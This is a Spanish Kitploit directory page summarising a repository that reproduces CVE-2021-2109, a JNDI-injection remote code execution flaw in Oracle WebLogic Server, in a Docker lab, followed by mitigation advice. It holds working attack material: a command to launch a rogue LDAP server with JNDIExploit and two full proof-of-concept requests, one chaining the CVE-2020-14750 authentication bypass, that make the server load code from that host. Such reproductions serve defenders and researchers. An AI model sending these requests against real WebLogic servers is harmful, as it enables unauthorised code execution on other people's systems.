Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-2109 — Reproducción y análisis paso a paso de CVE-2021-2109, una vulnerabilidad de ejecución remota de código en Weblogic Server mediante inyección JNDI, con POC y guía de mitigación. | Kitploit
Herramientas/GitHubGitHub/rabbitsafe/cve-2021-2109
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubrabbitsafe/cve-2021-2109

CVE-2021-2109

Reproducción y análisis paso a paso de CVE-2021-2109, una vulnerabilidad de ejecución remota de código en Weblogic Server mediante inyección JNDI, con POC y guía de mitigación.

Ver Repositorio
95hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-2109 Replicación y análisis de la vulnerabilidad de ejecución remota de código en Weblogic Server

En enero de 2021, Oracle publicó parches de seguridad que incluyen 329 nuevos parches de seguridad en la serie de productos Oracle. En este anuncio se mencionó especialmente el aviso de seguridad de Oracle WebLogic Server sobre la vulnerabilidad CVE-2020-14750, publicado el 1 de noviembre de 2020. Se recomienda encarecidamente a los clientes aplicar esta actualización de parche, así como los demás parches de este aviso. El número CVE CVE-2021-2109 corresponde a una vulnerabilidad de ejecución remota de código en Weblogic. La vulnerabilidad se debe principalmente a la inyección JNDI, lo que permite a un atacante explotar esta vulnerabilidad para ejecutar código de forma remota.

Las versiones afectadas son las siguientes: Weblogic Server 10.3.6.0.0 Weblogic Server 12.1.3.0.0 Weblogic Server 12.2.1.3.0 Weblogic Server 12.2.1.4.0 Weblogic Server 14.1.1.0.0

1. Replicación de la vulnerabilidad de ejecución remota de código CVE-2021-2109 en Weblogic Server

Use DOCKER para construir un entorno de prueba de Weblogic Server. Weblogic Server puede accederse normalmente. image

1.1 Inyección JNDI tras iniciar sesión de forma normal en el backend

En el primer caso, es necesario usar una cuenta de administrador para iniciar sesión en el backend de Weblogic Server, capturar el paquete de inicio de sesión con BurpSuite y obtener los datos de la cookie de inicio de sesión.

image

Inicie LDAP en la máquina local. Se puede descargar desde https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11. El comando es: java -jar JNDIExploit-v1.11.jar -i 192.168.131.1

image

Envíe el paquete POC de inyección JNDI de la vulnerabilidad de ejecución remota de código CVE-2021-2109 de Weblogic Server: POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

image

Ejecute el comando de sistema ipconfig a través de la variable cmd.

image

1.2 Inyección JNDI combinada con el acceso no autorizado al backend de Weblogic Server

En el segundo caso, no es necesario iniciar sesión en el backend de Weblogic Server. Se debe combinar con la vulnerabilidad de acceso no autorizado CVE-2020-14750 de Weblogic Server. Envíe el paquete POC de inyección JNDI de la vulnerabilidad de ejecución remota de código CVE-2021-2109 de Weblogic Server: POST /console/css/%25%32%65%25%32%65%25%32%66/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&cqqhandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

image

Ejecute calc.exe a través de la variable cmd para abrir la calculadora del sistema.

image

image

La calculadora del sistema se abre.

image

2. Recomendaciones de seguridad para la vulnerabilidad de ejecución remota de código CVE-2021-2109 en Weblogic Server

2.1 Deshabilitar el protocolo T3

Si no depende del protocolo T3 para la comunicación JVM, puede mitigar el impacto de esta vulnerabilidad bloqueando temporalmente el protocolo T3. 1). Acceda a la consola de Weblogic, en la página de configuración de base_domain, ingrese a la pestaña "Seguridad", haga clic en "Filtro" y configure el filtro. 2). En el filtro de conexión, ingrese: weblogic.security.net.ConnectionFilterImpl, y en el cuadro de reglas del filtro de conexión, ingrese: * * 7001 deny t3 t3s.

2.2 Deshabilitar IIOP

Inicie sesión en la consola de Weblogic, busque la opción "Habilitar IIOP", desmarque la casilla y reinicie para que surta efecto.

2.3 Deshabilitar temporalmente el acceso externo a /console/console.portal

2.4 Actualizar el parche de seguridad oficial

Descargar herramienta